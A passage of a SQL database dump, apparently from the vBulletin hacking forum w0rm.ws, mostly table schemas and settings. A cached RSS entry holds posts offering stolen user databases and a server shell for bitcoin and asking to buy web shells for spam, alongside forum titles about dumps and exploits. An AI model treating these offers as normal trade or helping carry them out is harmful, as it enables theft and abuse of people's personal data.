s:13:\"pmpermissions\";i:7;s:19:\"calendarpermissions\";i:63;s:14:\"wolpermissions\";i:15;s:16:\"adminpermissions\";i:0;s:18:\"genericpermissions\";i:1609504463;s:19:\"genericpermissions2\";i:1;s:14:\"genericoptions\";i:62;s:20:\"signaturepermissions\";i:237567;s:25:\"visitormessagepermissions\";i:63;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:80;s:15:\"avatarmaxheight\";i:80;s:13:\"avatarmaxsize\";i:20000;s:18:\"profilepicmaxwidth\";i:100;s:19:\"profilepicmaxheight\";i:100;s:17:\"profilepicmaxsize\";i:65535;s:14:\"sigpicmaxwidth\";i:500;s:15:\"sigpicmaxheight\";i:100;s:13:\"sigpicmaxsize\";i:10000;s:12:\"sigmaximages\";i:4;s:16:\"sigmaxsizebbcode\";i:7;s:11:\"sigmaxchars\";i:500;s:14:\"sigmaxrawchars\";i:1000;s:11:\"sigmaxlines\";i:0;s:18:\"usercsspermissions\";i:63;s:16:\"albumpermissions\";i:255;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:65535;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}i:2;a:48:{s:11:\"usergroupid\";i:2;s:5:\"title\";s:16:\"Registered Users\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:0:\"\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:5;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:12317183;s:13:\"pmpermissions\";i:3;s:19:\"calendarpermissions\";i:63;s:14:\"wolpermissions\";i:1;s:16:\"adminpermissions\";i:0;s:18:\"genericpermissions\";i:1579685063;s:19:\"genericpermissions2\";i:1;s:14:\"genericoptions\";i:62;s:20:\"signaturepermissions\";i:137215;s:25:\"visitormessagepermissions\";i:63;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:-1;s:15:\"avatarmaxheight\";i:-1;s:13:\"avatarmaxsize\";i:-1;s:18:\"profilepicmaxwidth\";i:100;s:19:\"profilepicmaxheight\";i:100;s:17:\"profilepicmaxsize\";i:65535;s:14:\"sigpicmaxwidth\";i:-1;s:15:\"sigpicmaxheight\";i:-1;s:13:\"sigpicmaxsize\";i:-1;s:12:\"sigmaximages\";i:4;s:16:\"sigmaxsizebbcode\";i:7;s:11:\"sigmaxchars\";i:500;s:14:\"sigmaxrawchars\";i:1000;s:11:\"sigmaxlines\";i:0;s:18:\"usercsspermissions\";i:63;s:16:\"albumpermissions\";i:255;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:55159;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}i:5;a:48:{s:11:\"usergroupid\";i:5;s:5:\"title\";s:16:\"Super Moderators\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:15:\"Super Moderator\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:0;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:16777215;s:13:\"pmpermissions\";i:7;s:19:\"calendarpermissions\";i:63;s:14:\"wolpermissions\";i:15;s:16:\"adminpermissions\";i:1;s:18:\"genericpermissions\";i:1609520879;s:19:\"genericpermissions2\";i:1;s:14:\"genericoptions\";i:63;s:20:\"signaturepermissions\";i:237567;s:25:\"visitormessagepermissions\";i:63;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:80;s:15:\"avatarmaxheight\";i:80;s:13:\"avatarmaxsize\";i:20000;s:18:\"profilepicmaxwidth\";i:100;s:19:\"profilepicmaxheight\";i:100;s:17:\"profilepicmaxsize\";i:65535;s:14:\"sigpicmaxwidth\";i:500;s:15:\"sigpicmaxheight\";i:100;s:13:\"sigpicmaxsize\";i:10000;s:12:\"sigmaximages\";i:4;s:16:\"sigmaxsizebbcode\";i:7;s:11:\"sigmaxchars\";i:500;s:14:\"sigmaxrawchars\";i:1000;s:11:\"sigmaxlines\";i:0;s:18:\"usercsspermissions\";i:63;s:16:\"albumpermissions\";i:255;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:65535;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}i:1;a:48:{s:11:\"usergroupid\";i:1;s:5:\"title\";s:28:\"Unregistered / Not Logged In\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:5:\"Guest\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:0;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:655375;s:13:\"pmpermissions\";i:0;s:19:\"calendarpermissions\";i:1;s:14:\"wolpermissions\";i:0;s:16:\"adminpermissions\";i:0;s:18:\"genericpermissions\";i:33554433;s:19:\"genericpermissions2\";i:0;s:14:\"genericoptions\";i:104;s:20:\"signaturepermissions\";i:0;s:25:\"visitormessagepermissions\";i:16;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:-1;s:15:\"avatarmaxheight\";i:-1;s:13:\"avatarmaxsize\";i:-1;s:18:\"profilepicmaxwidth\";i:-1;s:19:\"profilepicmaxheight\";i:-1;s:17:\"profilepicmaxsize\";i:-1;s:14:\"sigpicmaxwidth\";i:-1;s:15:\"sigpicmaxheight\";i:-1;s:13:\"sigpicmaxsize\";i:-1;s:12:\"sigmaximages\";i:-1;s:16:\"sigmaxsizebbcode\";i:-1;s:11:\"sigmaxchars\";i:-1;s:14:\"sigmaxrawchars\";i:-1;s:11:\"sigmaxlines\";i:-1;s:18:\"usercsspermissions\";i:0;s:16:\"albumpermissions\";i:192;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:64;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:0;}i:3;a:48:{s:11:\"usergroupid\";i:3;s:5:\"title\";s:33:\"Users Awaiting Email Confirmation\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:0:\"\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:1;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:655375;s:13:\"pmpermissions\";i:0;s:19:\"calendarpermissions\";i:1;s:14:\"wolpermissions\";i:0;s:16:\"adminpermissions\";i:0;s:18:\"genericpermissions\";i:33554499;s:19:\"genericpermissions2\";i:0;s:14:\"genericoptions\";i:56;s:20:\"signaturepermissions\";i:0;s:25:\"visitormessagepermissions\";i:16;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:-1;s:15:\"avatarmaxheight\";i:-1;s:13:\"avatarmaxsize\";i:-1;s:18:\"profilepicmaxwidth\";i:-1;s:19:\"profilepicmaxheight\";i:-1;s:17:\"profilepicmaxsize\";i:-1;s:14:\"sigpicmaxwidth\";i:-1;s:15:\"sigpicmaxheight\";i:-1;s:13:\"sigpicmaxsize\";i:-1;s:12:\"sigmaximages\";i:-1;s:16:\"sigmaxsizebbcode\";i:-1;s:11:\"sigmaxchars\";i:-1;s:14:\"sigmaxrawchars\";i:-1;s:11:\"sigmaxlines\";i:-1;s:18:\"usercsspermissions\";i:0;s:16:\"albumpermissions\";i:192;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:64;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}}', 1),
('userstats', 'a:4:{s:13:\"numbermembers\";s:3:\"324\";s:13:\"activemembers\";s:2:\"42\";s:11:\"newusername\";s:4:\"0day\";s:9:\"newuserid\";s:3:\"388\";}', 1),
('wol_spiders', '', 1);
DROP TABLE IF EXISTS `deletionlog`;
CREATE TABLE `deletionlog` (
`primaryid` int(10) unsigned NOT NULL DEFAULT '0',
`type` enum('post','thread','visitormessage','groupmessage','picturecomment') NOT NULL DEFAULT 'post',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`username` varchar(100) NOT NULL DEFAULT '',
`reason` varchar(125) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`primaryid`,`type`),
KEY `type` (`type`,`dateline`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `deletionlog` (`primaryid`, `type`, `userid`, `username`, `reason`, `dateline`) VALUES
(2, 'visitormessage', 173, 'tdss', 'spam', 1450799447),
(3, 'visitormessage', 171, 'st1x0', '', 1446728170),
(4, 'visitormessage', 173, 'tdss', 'spam', 1450799447),
(25, 'visitormessage', 171, 'st1x0', '', 1446728170),
(1826, 'thread', 1, 'admin', '', 1422256468),
(2311, 'thread', 100, 'w0rm', '', 1442834375),
(2316, 'thread', 100, 'w0rm', '', 1442834375);
DROP TABLE IF EXISTS `discussion`;
CREATE TABLE `discussion` (
`discussionid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`groupid` int(10) unsigned NOT NULL,
`firstpostid` int(10) unsigned NOT NULL,
`lastpostid` int(10) unsigned NOT NULL,
`lastpost` int(10) unsigned NOT NULL,
`lastposter` varchar(255) NOT NULL,
`lastposterid` int(10) unsigned NOT NULL,
`visible` int(10) unsigned NOT NULL DEFAULT '0',
`deleted` int(10) unsigned NOT NULL DEFAULT '0',
`moderation` int(10) unsigned NOT NULL DEFAULT '0',
`subscribers` enum('0','1') DEFAULT '0',
PRIMARY KEY (`discussionid`),
KEY `groupid` (`groupid`,`lastpost`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `discussionread`;
CREATE TABLE `discussionread` (
`userid` int(10) unsigned NOT NULL,
`discussionid` int(10) unsigned NOT NULL,
`readtime` int(10) unsigned NOT NULL,
PRIMARY KEY (`userid`,`discussionid`),
KEY `readtime` (`readtime`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `editlog`;
CREATE TABLE `editlog` (
`postid` int(10) unsigned NOT NULL DEFAULT '0',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`username` varchar(100) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`reason` varchar(200) NOT NULL DEFAULT '',
`hashistory` smallint(6) NOT NULL DEFAULT '0',
PRIMARY KEY (`postid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `editlog` (`postid`, `userid`, `username`, `dateline`, `reason`, `hashistory`) VALUES
(1028, 173, 'tdss', 1453649999, '', 1),
(2287, 171, 'st1x0', 1442920448, '', 1),
(2702, 173, 'tdss', 1457883960, '', 1),
(2800, 383, 'scene', 1456128780, '', 1),
(2801, 383, 'scene', 1456128861, '', 1),
(2865, 383, 'scene', 1456128876, '', 1),
(2878, 173, 'tdss', 1457983445, '', 1),
(2895, 178, 'dark001', 1445862196, '', 1),
(2994, 173, 'tdss', 1455217507, '', 1),
(3021, 173, 'tdss', 1457801344, '', 1),
(3045, 387, 'ke7hb', 1463760123, '', 1);
DROP TABLE IF EXISTS `event`;
CREATE TABLE `event` (
`eventid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`event` mediumtext,
`title` varchar(250) NOT NULL DEFAULT '',
`allowsmilies` smallint(6) NOT NULL DEFAULT '1',
`recurring` smallint(6) NOT NULL DEFAULT '0',
`recuroption` char(6) NOT NULL DEFAULT '',
`calendarid` int(10) unsigned NOT NULL DEFAULT '0',
`customfields` mediumtext,
`visible` smallint(6) NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`utc` decimal(4,2) NOT NULL DEFAULT '0.00',
`dst` smallint(6) NOT NULL DEFAULT '1',
`dateline_from` int(10) unsigned NOT NULL DEFAULT '0',
`dateline_to` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`eventid`),
KEY `userid` (`userid`),
KEY `calendarid` (`calendarid`),
KEY `visible` (`visible`),
KEY `daterange` (`dateline_to`,`dateline_from`,`visible`,`calendarid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `externalcache`;
CREATE TABLE `externalcache` (
`cachehash` char(32) NOT NULL DEFAULT '',
`text` mediumtext,
`headers` mediumtext,
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`forumid` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`cachehash`),
KEY `dateline` (`dateline`,`cachehash`),
KEY `forumid` (`forumid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `externalcache` (`cachehash`, `text`, `headers`, `dateline`, `forumid`) VALUES
('aca1b48699cf31b2aa8aebeb34deeeca', '\r\n\r\n
\n \n w0rm.ws \n https://w0rm.ws:443/\n w0rm.in * not so public IT community \n en \n Mon, 06 Jun 2016 17:14:44 GMT \n vBulletin \n 60 \n \n https://w0rm.ws/images/sleekpassion/misc/rss.jpg \n w0rm.ws \n https://w0rm.ws:443/\n \n - \n
Need to buy traffic or web shell \n https://w0rm.ws:443/showthread.php?t=2508&goto=newpost\n Sat, 28 May 2016 15:42:54 GMT \n \n Hello \r\nI\', So Sorry for make this Thread \r\n \r\nI need to buy traffic or web shell(use for spam) \r\nI not have problem to payment and money value \r\n \r\nif anyone Have this service Please contact me \r\n \r\nExploitkit@jabb3r.org \r\n \r\n \r\n \r\nKing Regard \r\nHunter Ekit \r\n\r\n]]>\n services \n hunter_exploitkit \n https://w0rm.ws:443/showthread.php?t=2508 \n \n - \n
BitTorrent \n https://w0rm.ws:443/showthread.php?t=2506&goto=newpost\n Fri, 20 May 2016 16:44:19 GMT \n \n BitTorrent forum db \r\n34k users \r\nname email ip_address concat(members_pass_hash,\':\',members_pass_salt) \r\n \r\nPrice: OFFER ME \r\n \r\nJabber: ke7hb@w0rm.ws \r\n\r\n]]> \n dumps \n ke7hb \n https://w0rm.ws:443/showthread.php?t=2506 \n \n - \n
westernunion.com \n https://w0rm.ws:443/showthread.php?t=2505&goto=newpost\n Fri, 20 May 2016 15:43:15 GMT \n 2TB data \nHistory of transactions \nAccounts (SHA1 hashed, users + employees) \nShell on storage server (not wu.com) \n \ndb only: 6k in BTC \ndb + shell:... \n 2TB data \nHistory of transactions \nAccounts (SHA1 hashed, users + employees) \nShell on storage server (not wu.com) \n \ndb only: 6k in BTC \ndb + shell: 17k in BTC \n \nJabber: ke7hb@w0rm.ws \r\n\r\n]]> \n dumps \n ke7hb \n https://w0rm.ws:443/showthread.php?t=2505 \n \n \n\n', 'a:5:{i:0;s:33:\"Cache-control: max-age=1465236884\";i:1;s:38:\"Expires: Mon, 06 Jun 2016 18:14:44 GMT\";i:2;s:44:\"Last-Modified: Mon, 06 Jun 2016 17:14:44 GMT\";i:3;s:40:\"ETag: \"aca1b48699cf31b2aa8aebeb34deeeca\"\";i:4;s:42:\"Content-Type: text/xml; charset=ISO-8859-1\";}', 1465233284, 0);
DROP TABLE IF EXISTS `faq`;
CREATE TABLE `faq` (
`faqname` varchar(250) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '',
`faqparent` varchar(50) NOT NULL DEFAULT '',
`displayorder` smallint(5) unsigned NOT NULL DEFAULT '0',
`volatile` smallint(5) unsigned NOT NULL DEFAULT '0',
`product` varchar(25) NOT NULL DEFAULT '',
PRIMARY KEY (`faqname`),
KEY `faqparent` (`faqparent`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `faq` (`faqname`, `faqparent`, `displayorder`, `volatile`, `product`) VALUES
('vb3_albums', 'vb3_user_profile', 9, 1, ''),
('vb3_announcements', 'vb3_board_usage', 4, 1, ''),
('vb3_attachments', 'vb3_reading_posting', 5, 1, ''),
('vb3_board_faq', 'faqroot', 200, 1, ''),
('vb3_board_usage', 'vb3_board_faq', 10, 1, ''),
('vb3_calendar', 'vb3_board_usage', 12, 1, ''),
('vb3_changing_details', 'vb3_user_profile', 3, 1, ''),
('vb3_contact_members', 'vb3_board_usage', 16, 1, ''),
('vb3_cookies', 'vb3_board_usage', 10, 1, ''),
('vb3_editing_deleting', 'vb3_reading_posting', 3, 1, ''),
('vb3_forums_threads_posts', 'vb3_board_usage', 1, 1, ''),
('vb3_friends_contacts', 'vb3_user_profile', 8, 1, ''),
('vb3_lost_passwords', 'vb3_board_usage', 11, 1, ''),
('vb3_members_list', 'vb3_board_usage', 13, 1, ''),
('vb3_message_icons', 'vb3_reading_posting', 7, 1, ''),
('vb3_mods_admins', 'vb3_reading_posting', 8, 1, ''),
('vb3_new_posts', 'vb3_board_usage', 6, 1, ''),
('vb3_notifications', 'vb3_board_usage', 14, 1, ''),
('vb3_other_settings', 'vb3_user_profile', 5, 1, ''),
('vb3_polls', 'vb3_reading_posting', 4, 1, ''),
('vb3_posting', 'vb3_reading_posting', 1, 1, ''),
('vb3_private_messages', 'vb3_user_profile', 10, 1, ''),
('vb3_profile_custom', 'vb3_user_profile', 6, 1, ''),
('vb3_public_profile', 'vb3_user_profile', 1, 1, ''),
('vb3_quick_links', 'vb3_board_usage', 15, 1, ''),
('vb3_rating_threads', 'vb3_board_usage', 7, 1, ''),
('vb3_reading_posting', 'vb3_board_faq', 30, 1, ''),
('vb3_register', 'vb3_board_usage', 2, 1, ''),
('vb3_replying', 'vb3_reading_posting', 2, 1, ''),
('vb3_reputation', 'vb3_user_profile', 12, 1, ''),
('vb3_rss_podcasting', 'vb3_board_usage', 18, 1, ''),
('vb3_search', 'vb3_board_usage', 3, 1, ''),
('vb3_signatures_avatars', 'vb3_user_profile', 4, 1, ''),
('vb3_smilies', 'vb3_reading_posting', 6, 1, ''),
('vb3_social_groups', 'vb3_user_profile', 7, 1, ''),
('vb3_subscriptions', 'vb3_user_profile', 11, 1, ''),
('vb3_tags', 'vb3_board_usage', 9, 1, ''),
('vb3_thread_display', 'vb3_board_usage', 5, 1, ''),
('vb3_thread_tools', 'vb3_board_usage', 8, 1, ''),
('vb3_troublesome_users', 'vb3_board_usage', 17, 1, ''),
('vb3_user_cp', 'vb3_user_profile', 2, 1, ''),
('vb3_user_profile', 'vb3_board_faq', 20, 1, '');
DROP TABLE IF EXISTS `forum`;
CREATE TABLE `forum` (
`forumid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`styleid` smallint(5) unsigned NOT NULL DEFAULT '0',
`title` varchar(100) NOT NULL DEFAULT '',
`title_clean` varchar(100) NOT NULL DEFAULT '',
`description` text,
`description_clean` text,
`options` int(10) unsigned NOT NULL DEFAULT '0',
`showprivate` tinyint(3) unsigned NOT NULL DEFAULT '0',
`displayorder` smallint(6) NOT NULL DEFAULT '0',
`replycount` int(10) unsigned NOT NULL DEFAULT '0',
`lastpost` int(11) NOT NULL DEFAULT '0',
`lastposter` varchar(100) NOT NULL DEFAULT '',
`lastpostid` int(10) unsigned NOT NULL DEFAULT '0',
`lastthread` varchar(250) NOT NULL DEFAULT '',
`lastthreadid` int(10) unsigned NOT NULL DEFAULT '0',
`lasticonid` smallint(6) NOT NULL DEFAULT '0',
`lastprefixid` varchar(25) NOT NULL DEFAULT '',
`threadcount` mediumint(8) unsigned NOT NULL DEFAULT '0',
`daysprune` smallint(6) NOT NULL DEFAULT '0',
`newpostemail` text,
`newthreademail` text,
`parentid` smallint(6) NOT NULL DEFAULT '0',
`parentlist` varchar(250) NOT NULL DEFAULT '',
`password` varchar(50) NOT NULL DEFAULT '',
`link` varchar(200) NOT NULL DEFAULT '',
`childlist` text,
`defaultsortfield` varchar(50) NOT NULL DEFAULT 'lastpost',
`defaultsortorder` enum('asc','desc') NOT NULL DEFAULT 'desc',
`imageprefix` varchar(100) NOT NULL DEFAULT '',
PRIMARY KEY (`forumid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `forum` (`forumid`, `styleid`, `title`, `title_clean`, `description`, `description_clean`, `options`, `showprivate`, `displayorder`, `replycount`, `lastpost`, `lastposter`, `lastpostid`, `lastthread`, `lastthreadid`, `lasticonid`, `lastprefixid`, `threadcount`, `daysprune`, `newpostemail`, `newthreademail`, `parentid`, `parentlist`, `password`, `link`, `childlist`, `defaultsortfield`, `defaultsortorder`, `imageprefix`) VALUES
(1, 0, 'invites', 'invites', '', '', 86017, 0, 1, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', -1, '1,-1', '', '', '1,2,4,-1', 'lastpost', 'desc', ''),
(2, 0, 'new', 'new', '', '', 89799, 0, 2, 647, 1443389868, 'Invite', 2862, 'mrsalvadore', 2387, 0, '', 634, -1, '', '', 1, '2,1,-1', '', '', '2,-1', 'lastpost', 'desc', ''),
(4, 0, 'activated', 'activated', '', '', 97991, 0, 3, 2, 1439233133, 'Invite', 2285, 'tdss', 1853, 0, '', 2, -1, '', '', 1, '4,1,-1', '', '', '4,-1', 'lastpost', 'desc', ''),
(6, 0, 'security', 'security', '', '', 97987, 0, 4, 2, 1403311001, 'w0rm', 1014, 'about', 1012, 0, '', 2, -1, '', '', -1, '6,-1', '', '', '6,7,9,10,-1', 'lastpost', 'desc', ''),
(7, 0, 'remote', 'remote', '', '', 97991, 0, 5, 229, 1462791410, 'admin', 3042, 'zoosk.com dump', 2503, 0, '', 56, -1, '', '', 6, '7,6,-1', '', '', '7,-1', 'lastpost', 'desc', ''),
(9, 0, 'local', 'local', '', '', 97991, 0, 6, 10, 1411933014, 'w0rm', 2210, 'Linksys Smart Wi-Fi Router EA6500', 1648, 0, '', 4, -1, '', '', 6, '9,6,-1', '', '', '9,-1', 'lastpost', 'desc', ''),
(10, 0, 'dumps', 'dumps', '', '', 97991, 0, 7, 19, 1448260568, 'dark001', 2932, 'Hacking Tools resources list', 2418, 0, '', 9, -1, '', '', 6, '10,6,-1', '', '', '10,-1', 'lastpost', 'desc', ''),
(11, 0, 'project', 'project', '', '', 86017, 0, 2, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', -1, '11,-1', '', '', '11,13,-1', 'lastpost', 'desc', ''),
(13, 0, 'news', 'news', '', '', 97991, 0, 13, 64, 1448155601, 'unixman', 2931, 'stells is ripper that i did escrow with', 2417, 0, '', 17, -1, '', '', 11, '13,11,-1', '', '', '13,-1', 'lastpost', 'desc', ''),
(14, 0, 'coding', 'coding', '', '', 86017, 0, 8, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', -1, '14,-1', '', '', '14,16,15,-1', 'lastpost', 'desc', ''),
(15, 0, 'source', 'source', '', '', 97991, 0, 10, 59, 1462955681, 'Scrack', 3043, '(REQ) GM Cryptolocker', 2504, 0, '', 24, -1, '', '', 14, '15,14,-1', '', '', '15,-1', 'lastpost', 'desc', ''),
(16, 0, 'develop', 'develop', '', '', 97991, 0, 9, 3, 1403473503, 'Psych0tr1a', 1070, '[Ruby] LFI via phpinfo() exploit', 1062, 0, '', 3, -1, '', '', 14, '16,14,-1', '', '', '16,-1', 'lastpost', 'desc', ''),
(17, 0, 'other', 'other', '', '', 86017, 0, 15, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', -1, '17,-1', '', '', '17,24,18,-1', 'lastpost', 'desc', ''),
(18, 0, 'flame', 'flame', '', '', 97991, 0, 16, 1, 1464181751, 'st1x0', 3047, 'db icloud', 2507, 0, '', 1, -1, '', '', 17, '18,17,-1', '', '', '18,-1', 'lastpost', 'desc', ''),
(24, 0, 'black list', 'black list', '', '', 97991, 0, 1, 1, 1464452024, 'ke7hb', 3050, 'D+P seller = banned!', 2509, 0, '', 1, -1, '', '', 17, '24,17,-1', '', '', '24,-1', 'lastpost', 'desc', ''),
(31, 0, 'Market', 'Market', '', '', 98043, 0, 9, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', -1, '31,-1', '', '', '31,32,35,36,39,37,38,-1', 'lastpost', 'desc', 'w0rm'),
(32, 0, 'services', 'services', '', '', 98047, 0, 1, 4, 1457279382, 'tdss', 3021, 'w0rm.ws Jabber', 2239, 0, '', 1, -1, '', '', 31, '32,31,-1', '', '', '32,-1', 'lastpost', 'desc', ''),
(35, 0, 'remote', 'remote', '', '', 98047, 0, 2, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', 31, '35,31,-1', '', '', '35,-1', 'lastpost', 'desc', ''),
(36, 0, 'local', 'local', '', '', 98047, 0, 3, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', 31, '36,31,-1', '', '', '36,-1', 'lastpost', 'desc', ''),
(37, 0, 'dumps', 'dumps', '', '', 98047, 0, 5, 22, 1463762659, 'ke7hb', 3046, 'BitTorrent', 2506, 0, '', 10, -1, '', '', 31, '37,31,-1', '', '', '37,-1', 'lastpost', 'desc', ''),
(38, 0, 'other', 'other', '', '', 98047, 0, 6, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', 31, '38,31,-1', '', '', '38,-1', 'lastpost', 'desc', ''),
(39, 0, 'source', 'source', '', '', 97991, 0, 4, 0, 0, '', 0, '', 0, 0, '', 0, -1, '', '', 31, '39,31,-1', '', '', '39,-1', 'lastpost', 'desc', '');
DROP TABLE IF EXISTS `forumpermission`;
CREATE TABLE `forumpermission` (
`forumpermissionid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`forumid` smallint(5) unsigned NOT NULL DEFAULT '0',
`usergroupid` smallint(5) unsigned NOT NULL DEFAULT '0',
`forumpermissions` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`forumpermissionid`),
UNIQUE KEY `ugid_fid` (`usergroupid`,`forumid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `forumpermission` (`forumpermissionid`, `forumid`, `usergroupid`, `forumpermissions`) VALUES
(9, 3, 1, 0),
(10, 3, 2, 16777215),
(11, 3, 3, 0),
(12, 3, 4, 0),
(13, 3, 5, 16777215),
(14, 3, 6, 16777215),
(15, 3, 7, 16777215),
(16, 3, 8, 0),
(25, 8, 1, 0),
(26, 8, 2, 16777215),
(27, 8, 3, 0),
(28, 8, 4, 0),
(29, 8, 5, 16777215),
(30, 8, 6, 16777215),
(31, 8, 7, 16777215),
(32, 8, 8, 0),
(115, 17, 1, 0),
(121, 1, 1, 0),
(122, 1, 2, 0),
(123, 1, 3, 0),
(124, 1, 4, 0),
(125, 1, 5, 0),
(126, 1, 6, 0),
(127, 1, 7, 0),
(128, 1, 8, 0),
(129, 11, 1, 0),
(130, 11, 2, 0),
(131, 11, 3, 0),
(132, 11, 4, 0),
(133, 11, 5, 0),
(134, 11, 6, 0),
(135, 11, 7, 0),
(136, 11, 8, 0),
(137, 6, 1, 0),
(138, 6, 2, 0),
(139, 6, 3, 0),
(140, 6, 4, 0),
(141, 6, 5, 0),
(142, 6, 6, 16777215),
(143, 6, 7, 16777215),
(144, 6, 8, 0),
(145, 14, 1, 0),
(146, 14, 2, 16777215),
(147, 14, 3, 0),
(148, 14, 4, 0),
(149, 14, 5, 16777215),
(150, 14, 6, 16777215),
(151, 14, 7, 16777215),
(152, 14, 8, 0),
(153, 13, 6, 16777215),
(154, 13, 2, 16777215),
(155, 7, 2, 16777215),
(156, 7, 5, 16777215),
(157, 16, 2, 16777215);
DROP TABLE IF EXISTS `forumprefixset`;
CREATE TABLE `forumprefixset` (
`forumid` int(10) unsigned NOT NULL DEFAULT '0',
`prefixsetid` varchar(25) NOT NULL DEFAULT '',
PRIMARY KEY (`forumid`,`prefixsetid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `forumread`;
CREATE TABLE `forumread` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`forumid` smallint(5) unsigned NOT NULL DEFAULT '0',
`readtime` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`forumid`,`userid`),
KEY `readtime` (`readtime`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `groupmessage`;
CREATE TABLE `groupmessage` (
`gmid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`discussionid` int(10) unsigned NOT NULL DEFAULT '0',
`postuserid` int(10) unsigned NOT NULL DEFAULT '0',
`postusername` varchar(100) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
